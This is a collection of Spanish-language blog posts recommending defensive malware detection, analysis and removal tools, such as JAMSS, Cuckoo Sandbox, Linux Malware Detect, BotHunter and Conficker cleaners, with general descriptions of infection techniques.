ARTCULOS BLOG EL GURU DE LA INFORMTICA SOBRE MALWARE

Script para rastrear malware en Joomla!.

Se trata de JAMSS (Joomla! Anti-Malware Scan Script) un script programado para ayudar a todos los administradores de Joomla! a comprobar si su sistema contiene malware, troyanos u otro cdigo malicioso. El script utiliza patrones actuales de fingerprinting para identificar las amenazas malware ms comunes, que puedan afectar a Joomla!. Este script no hace ninguna limpieza por su cuenta , solo informa sobre algn cdigo sospechoso en Joomla!. JAMSS no es 100% preciso, tiene algunos falsos positivos por lo que debe ser utilizado con sabidura y prudencia. Como ejecutarlo:

Se sube el archivo jamss.php al webroot de la cuenta de hosting. Se carga el archivo del escner en el navegador usando una URL como esta: http://www.<nombre del sitio web>.com/jamss.php La secuencia de comandos se ejecutar durante varios segundos, incluso minutos, dependiendo del nmero de archivos y carga de trabajo del servidor web. Si se desea realizar un anlisis en profundidad, que puede detectar las versiones ms recientes de malware se utiliza el parmetro DeepScan = 1. Esta funcin busca en los archivos las funciones de PHP que utiliza el malware. Ejemplo de ejecucin en el navegador: http://www. <nombre del sitio web>.com/jamss.php?deepscan=1 Como interpretar los resultados: El script inspecciona cdigo contenido dentro de archivos y trata de identificar posibles cdigos maliciosos usando muchas huellas digitales de malware conocido. Una vez que el script ha terminado de ejecutarse, generar y mostrar un informe para su revisin, que puede poseer falsos positivos y que debe ser interpretados con el fin de determinar si algn resultado en particular es una potencial amenaza de malware.

Para cada potencial amenaza, el informe mostrar: la ruta de acceso al archivo en cuestin, el patrn que se adapta al cdigo de malware y una breve descripcin de lo que este cdigo podra estar haciendo. Si existe alguna duda acerca de un archivo identificado por JAMSS, el archivo debe ser descargado e inspeccionado para determinar si hay un problema con l. Si existe sospecha de un archivo en Joomla! o archivos de extensiones: se descargaran todos los paquetes ZIP / TAR.XX y se comprobaran. A continuacin, se remplazara el archivo sospechoso por el original correspondiente de Joomla ! y con la misma versin que se est ej ecutando. Si el archivo sospechoso no existe en los archivos originales de instalacin de Joomla! o en los archivos de extensiones, se puede mover a una nueva carpeta segura (protegida por contrasea, o con permisos restrictivos) para que nadie tenga acceso y luego eliminarlo por completo, una vez que se determina que es un archivo que no necesita para el funcionamiento de Joomla!. En caso de dudas sobre archivos o extensiones que pertenecen a Joomla!, o qu hacer en caso de una infeccin, es muy recomendable utilizar los foros de Joomla!: http://forum.joomla.org/viewtopic.php?f=621&t=582854 Y no realizar alguna accin que pueda comprometer la disponibilidad de nuestro sitio web. JAMSS es un script para usar con ciertos conocimientos de PHP y como un anlisis rpido de malware. Ms informacin y descarga de JAMSS: https://github.com/btoplak/Joomla-Anti-Malware-Scan-Script/tree/forum Servicio Web que permite averiguar si una URL contiene spyware o malware. http://vtroger.blogspot.com.es/2013/08/servicio-web-que-permite-averiguar-si.html

Aplicacin para montar fcilmente un laboratorio de anlisis de malware.

Cuckoo Sandbox es un sistema de anlisis de malware de cdigo abierto. Esta aplicacin permite analizar cualquier archivo sospechoso y en cuestin de segundos, Cuckoo proporcionar resultados detallados que describen lo que resultara cuando se ejecuta dentro de un entorno aislado. El malware es la principal herramienta de los cibercriminales y de los principales ciberataques en organizaciones empresariales. En estos tiempos la deteccin y eliminacin de malware no es suficiente: es de vital importancia entender: cmo funcionan, lo que haran en los sistemas cuando se despliega, comprender el contexto, las motivaciones y los objetivos del ataque. De esta manera entender los hechos y responder con mayor eficacia para protegerse en el futuro. Hay infinidad de contextos en los que se puede necesitar implementar un entorno limitado, desde el anlisis de una violacin interna, recolectar datos procesables y analizar posibles amenazas. Cuckoo genera un puado de diferentes datos brutos, que incluyen:

Las funciones nativas y API de Windows llamadas huellas. Las copias de los archivos creados y eliminados del sistema de ficheros. Volcado de la memoria del proceso seleccionado. Volcado completo de memoria de la mquina de anlisis. Capturas de pantalla del escritorio durante la ejecucin del anlisis de malware. Volcado de red generado por la mquina que se utiliza para el anlisis.

A fin de que tales resultados sean mejor interpretados por los usuarios finales, Cuckoo es capaz de procesar y generar diferentes tipos de informes, que podran incluir: Informe JSON. Informe HTML. Informe MAEC. Interfaz de MongoDB. Interfaz HPFeeds.

Lo ms interesante, es que gracias a la amplia estructura modular del Cuckoo, es posible personalizar tanto el procesamiento y la fase de presentacin de informes. Cuckoo proporciona todos los requisitos para integrar fcilmente un entorno aislado con los sistemas existentes, con los datos que se deseen, de la manera que desee y con el formato que desee. Ms informacin y descarga de Cuckoo Sandbox: http://www.cuckoosandbox.org/ Documentacin de Cuckoo Sandbox: http://docs.cuckoosandbox.org/en/latest/ Herramienta de anlisis de malware: http://vtroger.blogspot.com.es/2010/05/herramienta-de-analisis-de-malware.html

Herramientas de anlisis de Malware en servidores y pginas Web.

Uno de los principales focos de infeccin de malware son las pginas web. En este post tratare sobre dos herramientas para detectar malware en servidores y pginas web. Webserver Malware Scanner: Es un simple script para la deteccin y el anlisis de las amenazas basadas en la Web. En la actualidad se encarga de: exploitkits, shells, cdigos de JavaScript ofuscado, ejecutables, iframes y escaneo de puertos.

Entre sus caractersticas destaca: Analizar en busca de los usuarios infectados DirectAdmin.

Analizar en busca de puertos abiertos vulnerables. Analizar en busca de exploits recientes. Analizar en busca de blogs WordPress infectados. Exploracin para detectar la infeccin en archivos .Html y. Php. Analizar en busca de javascript ofuscado en iframes. Analizar en busca de malware en iframes. Analizar en busca de shells PHP.

Ms informacin y descarga: http://sourceforge.net/projects/smscanner/ Linux Malware Detect: Es un escner de malware para Linux publicado bajo la licencia GNU GPLv2, que se ha diseado en torno a las amenazas en entornos hosting compartido. Utiliza datos de amenazas de los sistemas de deteccin de intrusiones de red IPS, para extraer el malware que est siendo utilizado activamente en los ataques y genera firmas para la deteccin. Adems, los datos de amenazas tambin se deriva de envos de los usuarios con la funcin checkout LMD y de recursos de la comunidad de malware. Las firmas que utiliza LMD son hashes md5 y coincide con el patrn HEX, tambin se pueden exportar fcilmente a cualquier nmero de herramientas de deteccin, como ClamAV. La principal baza de LMD es que en la actualidad existe una disponibilidad limitada de herramientas gratuitas para los sistemas Linux que se centran en la deteccin de malware. Muchos de los productos antivirus que realizan la deteccin de malware en Linux tienen un historial muy pobre de deteccin de amenazas, especialmente los destinados a los entornos de hosting compartido. Caractersticas: Archivo MD5 hash para la deteccin rpida e identificacin de amenazas. Patrn de juego basado en HEX para identificar variantes de amenazas. Componente estadstico de anlisis para la deteccin de amenazas ofuscadas (por ejemplo: base64). Deteccin integrada de ClamAV para utilizar como motor de escner para un rendimiento mejorado. Integrado funcin de actualizacin de firma con-u |-update. Integrado con funcin de actualizacin de versin-d |-update-ver. Opcin de exploracin reciente para analizar slo los archivos que se han aadido o cambiado en X das. Opcin de exploracin de ruta completa.

 Opcin de envi de sospecha de software malicioso a rfxn.com para su revisin. Sistema de informacin completo para ver los resultados del anlisis actual y anterior.

Posee cola de cuarentena que almacena las amenazas de una forma segura, sin permisos. Opcin de procesamiento por lotes de cuarentena para poner en cuarentena los resultados de anlisis actuales o anteriores. Opcin para restaurar los archivos a la ruta original. Normas para la eliminacin de cadenas inyectadas de malware. Opcin de procesamiento por lotes de limpieza para intentar la limpieza de informes de anlisis anteriores. Normas para eliminar base64 y gzinflate (software malicioso inyectado en base64). Anlisis diario de todos los cambios de los ltimos 24h de los directorios de usuario. Kernel monitor de inotify que puede tomar datos de la trayectoria de STDIN o FILE. Cmoda funcin de monitor inotify del kernel para supervisar los usuarios del sistema. Monitor inotify del ncleo puede ser restringido a una raz HTML configurable por el usuario. Kernel monitor de inotify con sysctl lmites dinmicos para un rendimiento ptimo. Inotify del kernel de alerta a travs de informes semanales diarios o opcionales. E-mail informacin de alerta despus de cada ejecucin de la exploracin (manual y diario).

La diferencia clave con LMD es que no se limita a detectar el malware basado en firmas hashes que alguien genera sino ms bien se trata de un proyecto global que rastrea activamente en las amenazas y genera firmas en base a esas amenazas del mundo real que actualmente estn circulando . Hay cuatro fuentes principales para los datos de malware que se utiliza para generar firmas LMD: Red de IPS: Una red formada por 35.000 sitios web y como tal recibe una gran cantidad de atauqes diarios, todo lo cual est registrado por IPS. Los eventos IPS se procesan para extraer la url malware, se clasifican y luego se generan firmas en su caso. La gran mayora de las firmas LMD se han derivado de IPS que extrajeron los datos. Datos de la Comunidad: Los datos se recogen de varios sitios web con comunidades que hablan de malware como clean-mx y malwaredomainlist y luego son procesados para recuperar el nuevo malware, revisar, clasificar y luego generar firmas.

 ClamAV: el hexgono MD5 y firmas de deteccin de ClamAV se monitorean las actualizaciones pertinentes que se aplican al grupo de usuarios de la LMD y se aaden al proyecto, segn corresponda. Hasta la fecha ha habido aproximadamente 400 firmas portadas de ClamAV mientras que el proyecto LMD ha contribuido de nuevo a ClamAV mediante la presentacin de ms de 1.100 firmas y contina hacindolo de manera continua. Envo de los usuarios: LMD tiene una funcin de comprobacin que permite a los usuarios enviar sospecha de malware para opinin, esto se ha convertido en una caracterstica muy popular y genera en promedio alrededor de 30 a 50 presentaciones por semana.

La firma LMD se actualiza normalmente una vez al da o con ms frecuencia dependiendo de los datos de amenazas entrantes de la funcin checkout LMD, la extraccin de malware IPS y otras fuentes. La actualizacin de las firmas en las instalaciones de LMD se realiza diariamente a travs de la secuencia de comandos por defecto cron.daily con la opcin de actualizacin, que se puede ejecutar manualmente en cualquier momento. Ms informacin y descarga de LMD: http://www.rfxn.com/projects/linux-malware-detect/

Herramienta para monitorizar procesos en busca de malware.

Se trata Procces Hacker una herramienta para sistemas Windows muy potente y polivalente que ayuda a monitorizar procesos, recursos del sistema, depurar software y detectar malware. Entre sus caractersticas principales destaca:

Una descripcin detallada de la actividad de los procesos que corren en el sistema resaltando los ms importantes. Utiliza grficos y estadsticas que permiten localizar rpidamente los procesos que ms recursos consumen y los que sobrecargan la CPU. Descubre los procesos que estn utilizando un archivo, esto nos permite saber porque no se puede eliminar un archivo determinado. Permite ver qu procesos tienen conexiones de red activas con detalles como: puerto, ip de destino, ancho de banda Obtener informacin en tiempo real sobre el acceso a disco. Puede ver trazas detalladas con kernel-mode, WOW64 y .NET. Crear, modificar y controlar los servicios de Windows. Muestra mscaras simblicas de acceso (por ejemplo Read y Write ), en lugar de nmeros (por ejemplo 0x12019f ). Esta herramienta combinada con la web ProcessLibrary un recurso gratuito de Uniblue Systems Ltd. que proporciona informacin acerca de los procesos y DLLs que se encuentran en los sistemas

Windows y que cuenta con una amplia base de datos y se actualiza regularmente con ms de 195.000 entradas; forman una combinacin excelente para detectar malware en un sistema Windows. Ms informacin y descarga de Procces Hacker: http://processhacker.sourceforge.net/

Servicio online para chequear la seguridad del navegador.

Las vulnerabilidades en los navegadores suelen ser la principal puerta de entrada de malware, por eso, es conveniente tener siempre actualizado el navegador. Pero hoy en da esto no es suficiente debido a que el malware tambin ataca las vulnerabilidades de los plugins del navegador o utiliza plugins propios.

Existe un servicio llamado Qualys BrowserCheck que permite chequear la seguridad del navegador, este servicio soporta los navegadores: IE 6.0 y versiones posteriores. Firefox 3.0 y posteriores. Chrome 4.0 y posteriores. Es capaz de chequear vulnerabilidades en los siguientes plugins. Adobe Flash Player. Adobe Reader. Adobe Shockwave Player. Apple Quicktime. BEA JRockit. Microsoft Silverlight. Microsoft Windows Media Player. Real Player. Sun Java. Windows Presentation Foundation (WPF) plugin para Mozilla.

Qualys BrowserCheck avisa de los plugins que no estn actualizados y pueden ser potencialmente peligrosos. Web de Qualys BrowserCheck: https://browsercheck.qualys.com/

Herramienta para explorar y eliminar BHO malvolos de Internet Explorer.

Se trata de SpyBHORemover una herramienta para explorar y eliminar BHO malvolos de Internet Explorer. Los BHO (Browser Helper Object) son plugins de Internet Explorer, archivos DLL que amplan las funcionalidades del navegador. Esta caracterstica est siendo empleada por software espa, para supervisar los hbitos de navegacin del usuario y para robar sus credenciales.

SpyBHORemover ayuda en la identificacin y la eliminacin rpida de malware que se aloja como BHO. Para esta labor utiliza anlisis heurstico y anlisis online utilizando servicios de internet designados a la deteccin de malware. Entre sus caractersticas destaca: Posee opciones de respaldo permite al usuario quitar y reinstalar BHO todas la veces que quiera. Verificacin en lnea de el BHO malvolo usando: VirusTotal, ThreatExpert y ProcessLibrary . Exhibe la informacin detallada para cada BHO instalado: nombre de clase de BHO, informacin del anlisis, compaa, nombre de producto, fecha de instalacin, CLSID del BHO y trayectoria del archivo de BHO.

SpyBHORemover es una herramienta portable independiente que no requiere ninguna instalacin. Trabaja en la Windows plataformas a partir de Windows Xp al ltimo sistema operativo, Windows 7. Ms informacin y descarga de SpyBHORemover: http://www.securityxploded.com/bhoremover.php

Herramienta de anlisis de malware.

Se trata de Zero Wine una herramienta bajo licencia GLP v2 para analizar dinmicamente el comportamiento del malware. Esta herramienta basa su funcionamiento en cargar el malware con Wine en una jaula virtual y recoge la informacin sobre los APIs llamados por el malware. La salida generada por Wine (usando la variable de entorno de eliminacin de errores WINEDEBUG) pertenece a las llamadas de las API usadas por el malware. Con esta informacin, se analiza el comportamiento del malware.

Se distribuye el Zero Wine en una imagen de la mquina virtual QEMU con un sistema operativo Debian instalado. La imagen contiene software para cargar y para analizar el malware y para

generar los informes basados en la informacin recopilada (este software se almacena en /home/malware/zerowine). Para correr Zero Wine se utiliza un script que carga la maquina virtual y lanza un servicio web en el puerto 8000 en dicha maquina. Para enviar archivos a analizar se utiliza la aplicacin web que corre en el servidor web de la maquina virtual. Existe una versin mejorada de este proyecto se llama Zero Wine Tryouts basado en el mismo motor pero con mejoras en el comportamiento y ms opciones. Es una excelente herramienta para analizar malware ya que nos permite ver todas las acciones que ejecuta el malware en el sistema. Ms informacin y descarga de Zero Wine: http://zerowine.sourceforge.net/ Ms informacin y descarga de Zero Wine Tryouts: http://zerowine-tryout.sourceforge.net/

Analizar libreras DLL agregadas a procesos en busca de malware.

Es una prctica muy habitual en l malware utilizar procesos del sistema para esconder libreras DLL dainas. Normalmente esta tcnica es empleada por programas de spyware. Para descubrir estas libreras DLL se puede utilizar la consola de comandos de Windows (cmd) y el comando tasklist /m, que muestra todas las libreras DLL cargadas por los procesos del sistema y con la pgina ProcessLibrary.com se puede obtener informacin sobre libreras DLL sospechosas.

Existe una herramienta llamada SpyDLLRemover que simplifica este proceso y permite desactivar las libreras perjudiciales. Esta herramienta escanea los procesos y marca las libreras peligrosas con colores: las peligrosas en rojo, las menos dainas en naranja y las dudosas en amarillo. En el caso de las marcadas en amarillo es necesario investigar si son dainas o no, para este fin, se puede utilizar ProcessLibrary.com para obtener informacin. Esta herramienta est disponible para: Windows Vista, XP y 2003. Para un correcto uso de SpyDLLRemover, es preciso ejecutarlo con una cuenta de administrador del sistema. Ms informacin y descarga de SpyDLLRemover: http://www.rootkitanalytics.com/tools/spy-dll-remover.php ProcessLibrary.com (Ingles): http://www.processlibrary.com/ Como averiguar los servicios que se esconden bajo el proceso Svchost.exe: http://vtroger.blogspot.com/2009/06/como-averiguar-los-servicios-que-se.html

Juego online de preguntas y respuestas sobre seguridad en Internet dirigido a menores.

El Instituto Nacional de Tecnologas de la Comunicacin (INTECO) y la iniciativa PantallasAmigas lanzan TriviRal un juego online de preguntas y respuestas sobre seguridad en Internet dirigido a menores. Se trata de un juego de preguntas y respuestas sobre riesgos en Internet, dirigido a menores de un amplio rango de edades (entre 9 y 15 aos principalmente). TriviRal combina un triple objetivo de carcter didctico (que los nios identifiquen algunos de los riesgos a los que se enfrentan en el uso de Internet), ldico (aprender jugando sobre medidas preventivas a adoptar) e informativo (dar a conocer la existencia de recursos y servicios de ayuda y respuesta as como sensibilizacin sobre la seguridad y la econfianza en el uso de las TIC por los menores). Los temas tratados son el cdigo malicioso o malware (virus, troyanos y espas), el ciberbullying (acoso entre menores) y el grooming (acoso sexual por adultos). TriviRal est diseado para que resulte un material educativo adecuado, tanto para uso en el mbito domstico, como para su empleo en el contexto escolar. Dispone de un sistema de cmputo y estadsticas que permite analizar los resultados para cada jugador (a elegir entre 1 y 4) y por cada rea temtica, de manera que ofrece a padres y educadores un mtodo para medir el grado de conocimiento y aprendizaje de los menores. Web de TriviRal: http://www.navegacionsegura.es/

Anlisis de documentos PDF en busca de cdigo malicioso.

Los archivos PDF pueden llegar a ser un riesgo de seguridad ya que debido a sus propiedades, en concreto el uso de filtros, permiten esconder informacin mediante la codificacin y compresin de streams. Esta caracterstica es utilizada para esconder cdigo Javascript y explotar las vulnerabilidades del lector PDF y as comprometer la seguridad del sistema. Con la herramienta Origami es posible buscar cdigo malicioso en archivos PDF, con potentes scripts y una interfaz grafica que facilita el anlisis. Entre las caractersticas de Origami destaca: Permite explorar documentos a nivel de objeto, buscando cdigo en streams codificados o ofuscados. Realiza operaciones de alto nivel, tales como: encriptacin, desciframiento y firma. Posee un interfaz grafico para analizar rpidamente en el contenido del documento. Origami contiene un conjunto de scripts para facilitar el anlisis y otras tareas: detectjs.rb: busca cdigo Javascript en el documento.

 embed.rb: agrega un attachment al documento. create-jspdf.rb: agrega cdigo Javascript a un archivo PDF, que se ejecutara cuando se abra el documento. moebius.rb: transforma un PDF en moebius. encrypt.rb: cifra un archivo PDF. Ms informacin y descarga de Origami: http://security-labs.org/origami

Detectar ordenadores zombis en la red local.

En un post anterior he escrito sobre ordenadores zombis y botnet (redes formadas por ordenadores zombis), en este post tratare sobre una herramienta muy eficaz para detectar ordenadores zombis en una red local llamada BotHunter. BotHunter es una herramienta pasiva de supervisin de red, diseada para reconocer los patrones de comunicacin de computadoras infectadas por malware dentro de un permetro de red. BotHunter est diseado para seguir los flujos de comunicacin entre los activos internos y las entidades externas de una botnet, buscando el rastro de evidencias de los intercambios de datos que se producen en la secuencia de infeccin del malware. BotHunter consiste en un motor basado en: partes del motor de la versin 2 de Snort y algunas mejoras. Este motor analiza las acciones que ocurren durante el proceso de infeccin del malware: Exploracin del anfitrin. Uso de exploit de ataque. Transferencia del software de control al sistema anfitrin. Dilogo del malware con el servidor C&C, encargado de la coordinacin y control del mismo. Propagacin del malware atacando otros host de la red. Comunicacin con la botnet usando P2P (en el pasado usaban para comunicarse el protocolo IRC). Despus de comparar estas acciones con los patrones de infeccin que tiene en su base de datos, si coincide, es detectada como infeccin. Entonces BotHunter realiza un informe detallado con todos los acontecimientos y fuentes que desempearon un papel durante el proceso de la infeccin. BotHunter es gratuito y est disponible para las plataformas: Windows XP/Vista/2003 Server 32 y 64. Linux, probado en distribuciones: Fedora, Red Hat Enterprise Linux, Debian y SuSE. FreeBSD, probado en la versin 7.2. Mac OS X, probado en: Tiger y Leopard, Mac OS 10.4 y 10.5.

BotHunter no es solo una herramienta ideal para la deteccin de ordenadores zombis en redes locales, tambin sirve para investigar las fases de infeccin del malware.

Ms informacin y descarga de BotHunter: http://www.bothunter.net/ Ordenadores zombis: http://vtroger.blogspot.com/2006/02/virus-zombis.html

Nuevas soluciones Anti-Malware.

En un post anterior he escrito sobre nuevas amenazas malware, en este voy a tratar sobre nuevas tendencias en el mundo de los antivirus. Se trata de dos propuestas antivirus totalmente diferentes: Quttera zero-day, se trata de una solucin antivirus que utiliza solo tcnicas heursticas. La mayora de antivirus compara el cdigo de cada archivo con el cdigo que est en su base de datos de los virus ya conocidos, comnmente esta tcnica se llama sistema de firmas de virus. Quttera utiliza solo mtodo heurstico, esta tcnica consiste en descompilar el cdigo del malware para simular que hara en el sistema si se llegara a ejecutar. Casi todos los antivirus tienen un mtodo heurstico, pero a diferencia de Quttera no lo utilizan es su proteccin en tiempo real solo lo utilizan para escneres minuciosos. Ventajas: Proteccin ideal malware reciente y exploits de da 0. Desventajas: Falsos positivos frecuentes, que necesitan de conocimientos avanzados para discernir un malware de una aplicacin inocua. Ms informacin y descarga de Quttera zero-day: http://quttera.com/free/ Panda Cloud Antivirus, es un antivirus basado en la tcnica de Cloud Computing. Esta tcnica consiste en basar las aplicaciones en servicios alojados de forma externa. De esta forma el antivirus no funciona mediante firmas que se descargan, la lgica de deteccin y eliminacin de malware est en los servidores de Panda. Este antivirus se apoya en Cloud Computing para recoger muestras de infecciones de los equipos y as descubrir nuevas infecciones. Ventajas: Un antivirus ligero que consume pocos recursos. Al delegar la deteccin y eliminacin en los servidores Panda las actualizaciones son inmediatas. Desventajas: Todas las de las tcnicas de Cloud Computing, la dependencia de los servicios en lnea: conexin, carga del servidor, estado del servidor. Ms informacin y descarga de Panda Cloud Antivirus: http://www.cloudantivirus.com/default.aspx?lang=spa

Nuevas amenazas de malware: http://vtroger.blogspot.com/2009/05/nuevas-amenazas-de-malware.html Antivirus gratuitos para Windows Vista: http://vtroger.blogspot.com/2007/05/antivirus-gratitos-para-windows-vista.html

Como averiguar los servicios que se esconden bajo el proceso Svchost.exe.

Svchost.exe es para muchos el proceso ms misterioso de Windows. Svchost.exe es un nombre de proceso de host genrico para servicios que se ejecutan desde bibliotecas de vnculos dinmicos (DLL). El archivo Svchost.exe se encuentra en la carpeta %SystemRoot%\System32. Durante el inicio, Svchost.exe examina la parte de servicios del Registro para elaborar una lista de los servicios que hay que cargar. Es posible que el sistema ejecute varias instancias de Svchost.exe al mismo tiempo. Cada sesin de Svchost.exe puede contener una agrupacin de servicios. Por tanto, se pueden ejecutar distintos servicios dependiendo de cmo y dnde se inicie Svchost.exe. Los grupos de Svchost.exe se pueden identificar en la siguiente clave del Registro:

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost Algunos gusanos se aprovechan de este proceso para camuflarse en el sistema y no ser detectados con una simple exploracin de procesos. Existe malware que utiliza esta tcnica de camuflaje como los gusanos: Jeefo, Welchia, Assarm y ms recientemente el Conficker. Con la herramienta gratuita Svchost Process Analyzer podemos enumerar todos los procesos svchost del sistema y comprobar los servicios que contienen. Aunque existe una forma de comprobarlo, en la consola de comandos mediante las ordenes: Tasklist /SVC y Tasklist /FI "PID eq IdDeProceso" (con las comillas). Se obtiene ms informacin y ms concisa con Svchost Process Analyzer. Esta herramienta est disponible para: Windows Vista, XP, 2000 y 2003. Para un correcto uso de este analizador del proceso svchost, es preciso ejecutarlo con una cuenta de administrador del sistema. Ms informacin y descarga de Svchost Process Analyzer: http://www.neuber.com/free/svchost-analyzer/index.html Descripcin de Svchost.exe en Windows: http://support.microsoft.com/kb/314056/es Herramientas para la deteccin y desinfeccin del virus Conficker: http://vtroger.blogspot.com/2009/04/herramientas-para-la-deteccion-y.html

Nuevas amenazas de malware.

Los creadores de malware, cada vez son ms ingeniosos a la hora de buscar fuentes de infeccin para extender sus creaciones. ltimamente se estn dando prcticas de infeccin muy ingeniosas, y en este post voy a destacar dos: El caso de la distribucin de copias troyanizadas de Windows 7, tanto en redes P2P como en pginas Web. Aprovechando el lanzamiento de Windows 7 y el inters de los usuarios Windows, por probar el nuevo sistema. Los creadores de malware cuelgan copias troyanizadas de Windows 7 en pginas Web y en redes P2P. Lo ms recomendable siempre es no descargar software de fuentes desconocidas y en este caso los que quieran probar Windows 7 lo mejor es siempre descargarlo de su pgina oficial. Cybercriminals Launch Tainted Windows 7 RC: http://blog.trendmicro.com/cybercriminals-launch-tainted-windows-7-rc/ Pgina oficial de descarga de Windows 7 RC: http://www.microsoft.com/windows/windows-7/download.aspx O el caso de las maquinas virtuales con sistemas infectados, una nueva prctica que consiste en compartir en internet maquinas virtuales infectadas por troyanos. Estas maquinas infectadas pueden ser un grave problema de seguridad, porque muchas veces, estas maquinas virtuales se ejecutan con conexin a la red local, lo que permite a los troyanos obtener informacin de la red (puertos, servicios) e enviar esa informacin al exterior, sniffar trafico e enviar esa informacin al exterior, realizar ataques de fuerza bruta o de denegacin de servicios o incluir el sistema en una red zombi. Existe una prueba de concepto de este ataque desarrollada por Sergio Castro llamada ViMtruder muy interesante. Lo ms recomendable en estos casos es: No descargar maquinas virtuales de internet si no se confa plenamente de donde proceden. En caso de redes locales grandes establecer polticas que impidan a los usuarios instalar o transferir maquinas virtuales, sin supervisin del administrador del sistema o departamento de seguridad (si existe). Monitorizar la red y tener un registro activo de los sistemas que componen la misma. Para poder situar la amenaza a tiempo. Utilizar un IDS para detectar los posibles ataques producidos por maquinas infectadas. Prueba de concepto ViMtruder de Sergio Castro: http://code.google.com/p/vimtruder/ Anteriores post relacionados con el tema: Tcnicas Malware: Falsos programas de seguridad informtica: http://vtroger.blogspot.com/2007/06/tcnicas-malware-falsos-programas-de.html Prcticas malware en emule II: http://vtroger.blogspot.com/2007/11/prcticas-malware-en-emule-ii.html

Practicas malware en Emule: http://vtroger.blogspot.com/2007/06/practicas-malware-en-emule.html

Herramientas para la deteccin y desinfeccin del virus Conficker.

El virus Conficker es el malware del que ms se habla en estos momentos, aunque en principio no es un virus peligroso para los sistemas que infecta sus mutaciones lo han convertido en un virus de propagacin rpida. Lo ms preocupante que puede tener este virus es el uso de su red zombi que puede estar entre 10 millones de ordenadores infectados. Aunque muchos esperaban el ataque de esta red el 1 abril, era lgico que no se produjese debido a su repercusin meditica, lo ms lgico sera realizar este ataque por sorpresa. Los que quieran conocer afondo este virus les dejo un artculo de The Honeynet Project llamado Know Your Enemy: Containing Conficker. Aqu van unas herramientas para su deteccin y desinfeccin: Escner online (de la Universidad de Bonn) para detectar las variantes Conficker.B y .C ,la variante A no se puede detectar con este escner: http://iv.cs.uni-bonn.de/fileadmin/user_upload/werner/cfdetector/ Downatool2 (de la Universidad de Bonn): Los nombres de dominio de diversas variantes de Conficker se pueden utilizar para detectar las mquinas infectadas en una red. Inspirado por el " downatool" de MHL y de B. Enright, Downatool2 puede ser utilizado para generar los dominios para Downadup/Conficker.A. B, y. C. http://iv.cs.uni-bonn.de/uploads/media/downatool2_01.exe Explorador de memoria (de la Universidad de Bonn): Es difcil identificar los archivos que contienen Conficker, porque se embalan y se cifran los ejecutables. Cuando Conficker funciona en memoria, se desempaqueta completamente. Este herramienta explora la memoria y proceso que corre en el sistema y termina los procesos y subprocesos del virus. Esto ayuda a proteger el funcionamiento de los servicios del sistema. http://iv.cs.uni-bonn.de/uploads/media/conficker_mem_killer.exe Detector de archivos y registro (de la Universidad de Bonn): Los nombres de archivo y las claves de Conficker.B y C del registro no son al azar se calculan en base al hostname. En base a esto la herramienta compruebe si hay DLL o claves del registro del virus Conficker. Desafortunadamente, Conficker.A utiliza nombres al azar y no se puede detectar con esta herramienta: http://iv.cs.uni-bonn.de/uploads/media/regnfile_01.exe Explorador de la red (de la Universidad de Bonn): Hay una manera de distinguir las mquinas infectadas basada en el cdigo de error para mensajes RPC: http://iv.cs.uni-bonn.de/uploads/media/scs_exe.zip Vacuna para el virus Conficker A, B, C y D (no siempre funciona): http://iv.cs.uni-bonn.de/uploads/media/nonficker_01.zip

McAfee W32/Conficker Stinger: utilidad para detectar y eliminar el virus Conficker y todas sus variantes. Resulta por tanto indicado para luchar contra: W32/Conficker W32/Conficker.gen W32/Conficker.sys W32/Conficker.worm W32/Conficker.worm!inf W32/Conficker.worm!job W32/Conficker.worm.dr W32/Conficker.worm.gen.a W32/Conficker.worm.gen.b W32/Conficker.worm.gen.c W32/Conficker.worm.gen.d

http://vil.nai.com/vil/averttools.aspx Asimismo una de las aplicaciones de escaneo de vulnerabilidades ms popular Nessus, cuenta con un plugin (#36036) que est basado en el explorador de la red (de la Universidad de Bonn). Se puede utilizar Nessus para detectar la infeccin en una red. The Honeynet Project Know Your Enemy: Containing Conficker: http://www.honeynet.org/files/KYE-Conficker.pdf Informe Universidad de Bonn: http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/ Virus zombis: http://vtroger.blogspot.com/2006/02/virus-zombis.html

Eliminar y evitar infecciones de virus que afectan al autorun.

Existe una gran cantidad de malware que utilizan el archivo AUTORUN.INF para ejecutarse e infectar el sistema, la mayora de este malware se propaga va memorias USB. Muchos antivirus no manejan eficientemente estos tipos de malware, aunque si suelen detectarlo cuando se ejecuta, no suelen controlar el dispositivo cuando se conecta. En algunos casos cuando lo detectan ya es demasiado tarde. Existen bloqueadores de autorun, pero no son efectivos si se ejecuta el autorun por descuido, entrando en la unidad. Existen aplicaciones que van mas all del tpico bloqueador de autorun, que adems examinan la unidad en busca virus, los eliminan de la unidad y del sistema si estuviera infectado. Yo destacara dos alternativas dentro de este tipo de programas: Ninja Pendisk y Autorun Eater. Son herramientas muy recomendadas como complemento de un antivirus en sistemas en los que utilizan constantemente memorias USB.

Ms informacin y descarga de Ninja Pendisk: http://nunobrito.eu/ninja/ Ms informacin y descarga de Autorun Eater: http://oldmcdonald.wordpress.com/2008/11/27/autorun-eater-v23/ Tcnicas de ataque mediante dispositivos USB. http://vtroger.blogspot.com/2008/04/tcnicas-de-ataque-mediante-dispositivos.html

Ingeniera inversa de procesos que corren en Windows.

Podemos realizar ingeniera inversas de procesos en Windows a nivel de API con la herramienta oSpy. Al trabajar a nivel de API permite una vista muy profunda de los procesos, sus comportamientos y ver su cdigo. Con esta herramienta podemos monitorizar los accesos a la red de los procesos: puertos que abre, servicios que emplea Adems podemos simular como afectara un entorno firewall en un proceso con una funcin llamada softwalling que permite aplicar reglas firewall al proceso monitorizado. Esta herramienta simplifica un anlisis de conexiones de una aplicacin ya que no hay que capturar el trfico y separarlo, como seria en el caso de usar un sniffer. Esta tcnica se puede utilizar para analizar procesos sospechosos de malware. Pero tambin para anlisis forense de malware, ya que se detectan las acciones del malware en el sistema, las conexiones de red que establece y a que direcciones las establece. Ms informacin y descarga de oSpy: http://code.google.com/p/ospy/

Eliminar virus que se propagan por Messenger.

